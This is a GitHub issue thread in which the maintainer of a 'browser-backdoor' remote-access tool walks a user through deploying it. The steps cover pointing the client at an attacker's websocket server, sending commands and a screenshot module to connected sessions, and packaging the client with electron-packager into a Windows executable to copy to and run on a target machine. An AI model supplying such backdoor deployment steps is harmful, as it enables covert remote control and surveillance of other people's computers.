### ISSUE TITLE
Example to use?

### ISSUE THREAD

**Issue by lgcambero** [IMcPwn/browser-backdoor#29]
Tks

**Comment by IMcPwn** [comment]
You could run the client and server on the same computer and point them to each other.

Configure index.html ws://your-server-here:1234 to ws://YOUR-LOCAL-IP-ADDRESS:1234
Example: ws://192.168.1.1:1234

The server will listen on that port by default.

Then run the client with 

``` sh
npm install
npm start
```

After starting the server you should see a connection open like these three:  [![Screenshots](https://raw.githubusercontent.com/wiki/IMcPwn/browser-backdoor/screenshots/BbsSessionOpen.png)](https://github.com/IMcPwn/browser-backdoor/wiki/Screenshots)

Then you can send commands like this:

[![Screenshots](https://raw.githubusercontent.com/wiki/IMcPwn/browser-backdoor/screenshots/BbsCommandAllSessions.png)](https://github.com/IMcPwn/browser-backdoor/wiki/Screenshots)

You could try a module:

[![Screenshots](https://raw.githubusercontent.com/wiki/IMcPwn/browser-backdoor/screenshots/BbsScreenshot.png)](https://github.com/IMcPwn/browser-backdoor/wiki/Screenshots)

**Comment by lgcambero** [comment]
Thanks, now works. I have to do so in Windows (Target), Kali (Attack)?

**Comment by IMcPwn** [comment]
Kali (or any Linux) should be the server (attack).

The target can be Windows, Mac, or Linux.

**Comment by lgcambero** [comment]
Sorry. Can you explain how to attack windows. I would post on my youtube channel https://www.youtube.com/c/luiscambero browser-backdoor. Thank you.

**Comment by IMcPwn** [comment]
The easiest way is to create an executable which can be done on the Kali system.

Once you're in the client directory and you configured index.html's IP address properly you can run the following commands:

``` sh
npm install electron-packager -g
electron-packager . --all
```

Then copy BrowserBackdoor-win32-x64/ or BrowserBackdoor-win32-ia32/ (depending if the Windows system is 64 bit or 32 bit) to the Windows machine and execute the BrowserBackdoor.exe file inside that folder.

**Comment by lgcambero** [comment]
Thanks for the help. Excellent explanation. I hope new modules. Regards!
